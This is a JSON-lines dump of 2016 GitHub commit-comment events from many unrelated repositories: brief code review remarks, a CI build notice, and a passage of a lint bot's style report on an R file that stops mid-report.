{"id":"4562628972","type":"CommitCommentEvent","actor":{"login":"agibsonccc"},"repo":{"name":"SkymindIO/spark"},"payload":{"comment":{"id":19020815,"position":null,"line":null,"path":null,"commit_id":"5374854fde881c382538084e9747067c2b834a36","created_at":"2016-09-14T15:18:09Z","updated_at":"2016-09-14T15:18:09Z","body":"No it should be configurable with spark.\n\nOn Thu, Sep 15, 2016 at 12:16 AM, François Garillot <\nnotifications@github.com> wrote:\n\n> BTW, you've noted that you're requesting a GPU # for your tasks that is\n> equal to your # of CPUs to use ?\n> 5374854?w=1#diff-d425d35aa23c47a62fbb538554f2f2cfR276\n> <https://github.com/SkymindIO/spark/commit/5374854fde881c382538084e9747067c2b834a36?w=1#diff-d425d35aa23c47a62fbb538554f2f2cfR276>\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/SkymindIO/spark/commit/5374854fde881c382538084e9747067c2b834a36#commitcomment-19020780>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABF18pIe8qO0cVUhbj2pjBy7sbG-s80zks5qqA_MgaJpZM4J81fm>\n> .\n>\n"}},"created_at":"2016-09-14T15:18:09Z"}
{"id":"4562629068","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020816,"position":51,"line":51,"path":"murano/tests/unit/engine/system/test_net_explorer.py","commit_id":"b363a4a51b31072218bfab0a969ef863ce0ccc94","created_at":"2016-09-14T15:18:10Z","updated_at":"2016-09-14T15:18:10Z","body":"add assert"}},"created_at":"2016-09-14T15:18:10Z"}
{"id":"4562630192","type":"CommitCommentEvent","actor":{"login":"sblanco1"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020817,"position":48,"line":48,"path":"murano/tests/unit/engine/system/test_net_explorer.py","commit_id":"b363a4a51b31072218bfab0a969ef863ce0ccc94","created_at":"2016-09-14T15:18:20Z","updated_at":"2016-09-14T15:18:20Z","body":"Add assertion"}},"created_at":"2016-09-14T15:18:20Z"}
{"id":"4562631253","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020819,"position":48,"line":48,"path":"murano/tests/unit/engine/system/test_resource_manager.py","commit_id":"cb84827d29e8ab2bae17a00d29e4d1d290e65883","created_at":"2016-09-14T15:18:28Z","updated_at":"2016-09-14T15:18:28Z","body":"ADD ASSERT"}},"created_at":"2016-09-14T15:18:28Z"}
{"id":"4562632698","type":"CommitCommentEvent","actor":{"login":"sblanco1"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020827,"position":40,"line":40,"path":"murano/tests/unit/engine/system/test_resource_manager.py","commit_id":"cb84827d29e8ab2bae17a00d29e4d1d290e65883","created_at":"2016-09-14T15:18:41Z","updated_at":"2016-09-14T15:18:41Z","body":"Add assertion"}},"created_at":"2016-09-14T15:18:41Z"}
{"id":"4562632886","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":19020830,"position":14,"line":14,"path":"ui/queryDB.js","commit_id":"3f2f3cd2d7d7e2874f470588fb0e41d4fc4b22f1","created_at":"2016-09-14T15:18:42Z","updated_at":"2016-09-14T15:18:42Z","body":"    export async function queryMovies(searchQuery) {\r\n      const response = await fetch(MOVIE_LIST + searchQuery);\r\n      const json = await response.json();\r\n      return json.Search;\r\n    }"}},"created_at":"2016-09-14T15:18:42Z"}
{"id":"4562633667","type":"CommitCommentEvent","actor":{"login":"sblanco1"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020833,"position":45,"line":45,"path":"murano/tests/unit/engine/system/test_resource_manager.py","commit_id":"cb84827d29e8ab2bae17a00d29e4d1d290e65883","created_at":"2016-09-14T15:18:49Z","updated_at":"2016-09-14T15:18:49Z","body":"Add assertion"}},"created_at":"2016-09-14T15:18:49Z"}
{"id":"4562633700","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19020834,"position":5,"line":0,"path":"libraries/stdlib/src/kotlin/collections/AbstractMap.kt","commit_id":"49864cae72870a9e57381a1fc61870bff60f3e28","created_at":"2016-09-14T15:18:49Z","updated_at":"2016-09-14T15:18:49Z","body":"This `AbstractMap` is in common part of the library, so it is needed in JVM multithreaded environment."}},"created_at":"2016-09-14T15:18:49Z"}
{"id":"4562633916","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19020836,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-14T15:18:51Z","updated_at":"2016-09-14T15:18:51Z","body":"@snicolet Following example: Qe8 pins pe2 on Ke1 and Nc3 blocks Bb4 for a discovered check on the king on e1.\r\nYour version would handle both pieces Qe8 and Bb4 as pinners in SEE and as soon the Knight moves into the exchange square the pawn on e2 would be free to capture although it is still oinned "}},"created_at":"2016-09-14T15:18:51Z"}
{"id":"4562634044","type":"CommitCommentEvent","actor":{"login":"hillharmon"},"repo":{"name":"hillharmon/Zika-Project"},"payload":{"comment":{"id":19020837,"position":null,"line":null,"path":null,"commit_id":"ab76058f8ff4f266acd276e02c2b75fdadf177bb","created_at":"2016-09-14T15:18:52Z","updated_at":"2016-09-14T15:18:52Z","body":"Our project that we would like to bring to the class is focused on developing informative and interactive visualizations of the current (and potentially projected, pending the outcome of an independent project) Zika case counts both in and outside the continental US. The goal is to implement an easily updateable (as new case counts are received) script that allows us to produce interactive visualizations of the spatio-temporal disease burden a comment"}},"created_at":"2016-09-14T15:18:52Z"}
{"id":"4562634559","type":"CommitCommentEvent","actor":{"login":"kroberts1654"},"repo":{"name":"hillharmon/Zika-Project"},"payload":{"comment":{"id":19020840,"position":null,"line":null,"path":null,"commit_id":"d376bdb476cabb30d854c5d06a15468ba484fd7c","created_at":"2016-09-14T15:18:57Z","updated_at":"2016-09-14T15:18:57Z","body":"fixed typo :)"}},"created_at":"2016-09-14T15:18:57Z"}
{"id":"4562635503","type":"CommitCommentEvent","actor":{"login":"ecodonohoe"},"repo":{"name":"AnjaMahler/IFIscripts"},"payload":{"comment":{"id":19020843,"position":null,"line":null,"path":null,"commit_id":"92bf2d5c54da369a215e7c8c7e9a90f0ae7826fe","created_at":"2016-09-14T15:19:07Z","updated_at":"2016-09-14T15:19:07Z","body":"@kieranjol Do I have to create this pull request or @AnjaMahler ?\r\n"}},"created_at":"2016-09-14T15:19:07Z"}
{"id":"4562637197","type":"CommitCommentEvent","actor":{"login":"cbxp"},"repo":{"name":"riot/riot"},"payload":{"comment":{"id":19020852,"position":5,"line":108,"path":"lib/browser/tag/update.js","commit_id":"3fae681d4681af9947e9d1c97e5d67d7565cd9ad","created_at":"2016-09-14T15:19:22Z","updated_at":"2016-09-14T15:19:22Z","body":"In IE, dom.value returns and empty string if the value attribute actually contains the riot expression, so riot leaves it there."}},"created_at":"2016-09-14T15:19:22Z"}
{"id":"4562639466","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":19020860,"position":14,"line":14,"path":"ui/reducer.js","commit_id":"3f2f3cd2d7d7e2874f470588fb0e41d4fc4b22f1","created_at":"2016-09-14T15:19:42Z","updated_at":"2016-09-14T15:19:42Z","body":"👏 "}},"created_at":"2016-09-14T15:19:42Z"}
{"id":"4562642139","type":"CommitCommentEvent","actor":{"login":"Cherishao"},"repo":{"name":"RunningSky/codoforum_zh_translation"},"payload":{"comment":{"id":19020864,"position":null,"line":null,"path":null,"commit_id":"2b76b891132d2047bc77260e047e7d2f20135c6b","created_at":"2016-09-14T15:20:09Z","updated_at":"2016-09-14T15:20:09Z","body":"good job\r\n"}},"created_at":"2016-09-14T15:20:09Z"}
{"id":"4562643163","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19020865,"position":17,"line":1388,"path":"src/game/AI/CreatureEventAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T15:20:20Z","updated_at":"2016-09-14T15:20:20Z","body":"well, if we can find a way to make sure some mobs have a permanent state of no react and no move, then I see no problem moving away from flags, but currently the core is not set up to give permanent states is it? - also, since some mobs are sniffed with the unit flag passive we may have some conflict there as well, I'm not sure..."}},"created_at":"2016-09-14T15:20:20Z"}
{"id":"4562645146","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":19020868,"position":6,"line":6,"path":"ui/sagas.js","commit_id":"3f2f3cd2d7d7e2874f470588fb0e41d4fc4b22f1","created_at":"2016-09-14T15:20:38Z","updated_at":"2016-09-14T15:20:38Z","body":"Two things here. One, you should never reference types by their string. Instead you should reference them by the const:\r\n\r\n    import types from ./types';\r\n\r\n    return { type: types.RESPONSE_MOVIE_LIST };"}},"created_at":"2016-09-14T15:20:38Z"}
{"id":"4562647565","type":"CommitCommentEvent","actor":{"login":"cbxp"},"repo":{"name":"riot/riot"},"payload":{"comment":{"id":19020880,"position":null,"line":null,"path":null,"commit_id":"3fae681d4681af9947e9d1c97e5d67d7565cd9ad","created_at":"2016-09-14T15:21:02Z","updated_at":"2016-09-14T15:21:02Z","body":"Just a reminder: the original plnkr test case still fails in IE."}},"created_at":"2016-09-14T15:21:02Z"}
{"id":"4562648549","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"akoh17/react-starter"},"payload":{"comment":{"id":19020886,"position":11,"line":11,"path":"ui/sagas.js","commit_id":"3f2f3cd2d7d7e2874f470588fb0e41d4fc4b22f1","created_at":"2016-09-14T15:21:13Z","updated_at":"2016-09-14T15:21:13Z","body":"You should never reference types by their string. Instead you should reference them by the const:\r\n\r\n    import types from ./types';\r\n\r\n    const { searchQuery } = yield take(types.REQUEST_MOVIE_LIST);"}},"created_at":"2016-09-14T15:21:13Z"}
{"id":"4562649426","type":"CommitCommentEvent","actor":{"login":"rvion"},"repo":{"name":"commercialhaskell/jump"},"payload":{"comment":{"id":19020888,"position":null,"line":null,"path":null,"commit_id":"9dd69cf130f8d5fca1b2e47e12dc1164a9e8d470","created_at":"2016-09-14T15:21:21Z","updated_at":"2016-09-14T15:21:21Z","body":"quick thought: it would have been less 💥  to just set the default github branch to some readme-only branch, while leaving the master branch as is ^^"}},"created_at":"2016-09-14T15:21:21Z"}
{"id":"4562649432","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020889,"position":58,"line":58,"path":"murano/tests/unit/engine/system/test_workflowclient.py","commit_id":"b6a6f719233753699f813fff97971486b98cf3b3","created_at":"2016-09-14T15:21:21Z","updated_at":"2016-09-14T15:21:21Z","body":"ASSERT"}},"created_at":"2016-09-14T15:21:21Z"}
{"id":"4562650140","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020895,"position":63,"line":63,"path":"murano/tests/unit/engine/system/test_workflowclient.py","commit_id":"b6a6f719233753699f813fff97971486b98cf3b3","created_at":"2016-09-14T15:21:28Z","updated_at":"2016-09-14T15:21:28Z","body":"ASSERT"}},"created_at":"2016-09-14T15:21:28Z"}
{"id":"4562650998","type":"CommitCommentEvent","actor":{"login":"timbeadle"},"repo":{"name":"jenkinsci/CFLint-plugin"},"payload":{"comment":{"id":19020900,"position":21,"line":59,"path":"src/main/java/org/jenkinsci/plugins/cflint/parser/LintParser.java","commit_id":"cdd41fc8e6cb3bb2727c49689d40289f937f6bdc","created_at":"2016-09-14T15:21:35Z","updated_at":"2016-09-14T15:21:35Z","body":"This is giving us a permissions error. We're running on Linux, so that path doesn't exist."}},"created_at":"2016-09-14T15:21:35Z"}
{"id":"4562651927","type":"CommitCommentEvent","actor":{"login":"sblanco1"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020906,"position":54,"line":54,"path":"murano/tests/unit/engine/system/test_workflowclient.py","commit_id":"b6a6f719233753699f813fff97971486b98cf3b3","created_at":"2016-09-14T15:21:43Z","updated_at":"2016-09-14T15:21:43Z","body":"Add assertion"}},"created_at":"2016-09-14T15:21:43Z"}
{"id":"4562652848","type":"CommitCommentEvent","actor":{"login":"sblanco1"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020910,"position":60,"line":60,"path":"murano/tests/unit/engine/system/test_workflowclient.py","commit_id":"b6a6f719233753699f813fff97971486b98cf3b3","created_at":"2016-09-14T15:21:52Z","updated_at":"2016-09-14T15:21:52Z","body":"Add assertion"}},"created_at":"2016-09-14T15:21:52Z"}
{"id":"4562653627","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19020911,"position":4,"line":336,"path":"openstudiocore/src/utilities/CMakeLists.txt","commit_id":"0e6d0249556fae9afef428dc1c0822388c29d780","created_at":"2016-09-14T15:21:59Z","updated_at":"2016-09-14T15:21:59Z","body":"No, I moved SWIG to be an ExternalProject in core (because the hard coded lib path that gets configured in makes swig not portable), so this makes sure that SWIG exists to generate this file."}},"created_at":"2016-09-14T15:21:59Z"}
{"id":"4562654439","type":"CommitCommentEvent","actor":{"login":"alex-liberty"},"repo":{"name":"minsk-hackerspace/hsWEB"},"payload":{"comment":{"id":19020913,"position":22,"line":19,"path":"README.md","commit_id":"bbdc200a85c33d9fa965158958ba032b347a2931","created_at":"2016-09-14T15:22:09Z","updated_at":"2016-09-14T15:22:09Z","body":"`bundler install --path=\"./your/path\"` не является выходом из ситуации?"}},"created_at":"2016-09-14T15:22:09Z"}
{"id":"4562654849","type":"CommitCommentEvent","actor":{"login":"nfeske"},"repo":{"name":"ehmry/genode"},"payload":{"comment":{"id":19020914,"position":74,"line":68,"path":"repos/os/include/input_session/client.h","commit_id":"3429f57dcc43979ca9c4fe8393c7103f8bcca5fc","created_at":"2016-09-14T15:22:12Z","updated_at":"2016-09-14T15:22:12Z","body":"As another safety measure, we might check the bounds of `n*sizeof(Event)` against `_event_ds.size()`."}},"created_at":"2016-09-14T15:22:12Z"}
{"id":"4562655233","type":"CommitCommentEvent","actor":{"login":"ilya-g"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19020917,"position":6,"line":0,"path":"js/js.libraries/src/core/collections/LinkedHashMap.kt","commit_id":"49864cae72870a9e57381a1fc61870bff60f3e28","created_at":"2016-09-14T15:22:15Z","updated_at":"2016-09-14T15:22:15Z","body":"Yes, explicit `public` is required to make protected function public on override"}},"created_at":"2016-09-14T15:22:15Z"}
{"id":"4562656295","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020921,"position":29,"line":29,"path":"murano/tests/unit/test_opts.py","commit_id":"43f97ac4370277da6e3267265c2a9ba57f1e293f","created_at":"2016-09-14T15:22:25Z","updated_at":"2016-09-14T15:22:25Z","body":"ASSERT"}},"created_at":"2016-09-14T15:22:25Z"}
{"id":"4562657081","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19020924,"position":null,"line":null,"path":null,"commit_id":"8e01ccfb8236db32c4b86c1adfdbb2ae45db2e48","created_at":"2016-09-14T15:22:32Z","updated_at":"2016-09-14T15:22:32Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1003](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13283&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-14T15:22:32Z"}
{"id":"4562657153","type":"CommitCommentEvent","actor":{"login":"DavidPurcell"},"repo":{"name":"DavidPurcell/murano_temp"},"payload":{"comment":{"id":19020925,"position":32,"line":32,"path":"murano/tests/unit/test_opts.py","commit_id":"43f97ac4370277da6e3267265c2a9ba57f1e293f","created_at":"2016-09-14T15:22:32Z","updated_at":"2016-09-14T15:22:32Z","body":"ASSERT"}},"created_at":"2016-09-14T15:22:32Z"}
{"id":"4562657203","type":"CommitCommentEvent","actor":{"login":"xenx"},"repo":{"name":"xenx/recommendation_system"},"payload":{"comment":{"id":19020927,"position":null,"line":null,"path":null,"commit_id":"b85e31942a94d42c7266e20c42bcdbd9bc6feaf4","created_at":"2016-09-14T15:22:32Z","updated_at":"2016-09-14T15:22:32Z","body":"))"}},"created_at":"2016-09-14T15:22:32Z"}
{"id":"4562657320","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"Phatcat/mangos-wotlk"},"payload":{"comment":{"id":19020928,"position":14,"line":48,"path":"src/game/AI/GuardianAI.cpp","commit_id":"e4928d20a0680a68d73c8e41417cd3d9e0234c80","created_at":"2016-09-14T15:22:34Z","updated_at":"2016-09-14T15:22:34Z","body":"Yes. I agree. I just didn't know how to apply this in the AIselector properly; the AISelector also has to be refactored to handle the issue with petpossession as well maybe since there seems to be some issues with their behaviour now"}},"created_at":"2016-09-14T15:22:34Z"}
{"id":"4562659286","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19020936,"position":null,"line":null,"path":null,"commit_id":"e1495896eb7377f49e9be995d2afba579b4c60fb","created_at":"2016-09-14T15:22:51Z","updated_at":"2016-09-14T15:22:51Z","body":"[R/ABC_SMC.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L27) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:29:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L29) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:109:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L109) *style:* **lines should not be more than 80 characters.**\n```r\n​                         init_epsilon_values, prior_generating_function, prior_density_function,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:110:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L110) *style:* **lines should not be more than 80 characters.**\n```r\n​                         number_of_particles = 1000, sigma = 0.05, stop_rate = 1e-5) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:111:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L111) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:112:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L112) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:119:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L119) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:122:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L122) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:128:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L128) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:130:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L130) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:135:7:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L135) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    if(init_epsilon_values[j] < 0) {\n      ^\n```\n[R/ABC_SMC.R:138:33:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L138) *style:* **Commas should always have a space after.**\n```r\n​           \"but were instead: \",init_epsilon_values[j])\n                                ^\n```\n[R/ABC_SMC.R:140:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L140) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/ABC_SMC.R:145:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L145) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:152:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L152) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:160:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L160) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/ABC_SMC.R:164:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L164) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/ABC_SMC.R:173:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L173) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[R/ABC_SMC.R:183:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L183) *style:* **Trailing whitespace is superfluous.**\n```r\n​        \n^~~~~~~~\n```\n[R/ABC_SMC.R:187:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L187) *style:* **Trailing whitespace is superfluous.**\n```r\n​        \n^~~~~~~~\n```\n[R/ABC_SMC.R:191:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L191) *style:* **Trailing whitespace is superfluous.**\n```r\n​        \n^~~~~~~~\n```\n[R/ABC_SMC.R:197:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L197) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:203:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L203) *style:* **Trailing whitespace is superfluous.**\n```r\n​        \n^~~~~~~~\n```\n[R/ABC_SMC.R:209:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L209) *style:* **Trailing whitespace is superfluous.**\n```r\n​        \n^~~~~~~~\n```\n[R/ABC_SMC.R:220:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L220) *style:* **Trailing whitespace is superfluous.**\n```r\n​        \n^~~~~~~~\n```\n[R/ABC_SMC.R:228:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L228) *style:* **lines should not be more than 80 characters.**\n```r\n​                                                previous_params, parameters, sigma, prior_density_function)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:231:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L231) *style:* **Trailing whitespace is superfluous.**\n```r\n​          \n^~~~~~~~~~\n```\n[R/ABC_SMC.R:239:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L239) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:257:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L257) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:293:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L293) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:301:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L301) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:305:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L305) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:306:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L306) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:313:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L313) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:316:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L316) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:322:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L322) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/ABC_SMC.R:330:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L330) *style:* **Trailing whitespace is superfluous.**\n```r\n​        \n^~~~~~~~\n```\n[R/ABC_SMC.R:338:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L338) *style:* **Trailing whitespace is superfluous.**\n```r\n​        \n^~~~~~~~\n```\n[R/ABC_SMC.R:348:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L348) *style:* **Trailing whitespace is superfluous.**\n```r\n​        \n^~~~~~~~\n```\n[R/ABC_SMC.R:354:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L354) *style:* **Trailing whitespace is superfluous.**\n```r\n​        \n^~~~~~~~\n```\n[R/ABC_SMC.R:357:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L357) *style:* **Trailing whitespace is superfluous.**\n```r\n​          \n^~~~~~~~~~\n```\n[R/ABC_SMC.R:370:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L370) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:372:1:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/R/ABC_SMC.R#L372) *style:* **Trailing whitespace is superfluous.**\n```r\n​    \n^~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:4:50:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L4) *style:* **Trailing whitespace is superfluous.**\n```r\n​  skip(\"Convergence seems to take extremely long, \n                                                 ^\n```\n[tests/testthat/test_abc_smc_nltt.R:6:3:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L6) *style:* **Variable and function names should be all lowercase.**\n```r\n​  treeSim <- function(params) {\n  ^~~~~~~\n```\n[tests/testthat/test_abc_smc_nltt.R:7:6:](https://github.com/richelbilderbeek/nLTT/blob/e1495896eb7377f49e9be995d2afba579b4c60fb/tests/testthat/test_abc_smc_nltt.R#L7) *style:* **Commented code should be removed.**\n```r\n​   # cat(params,\"\\n\")\n     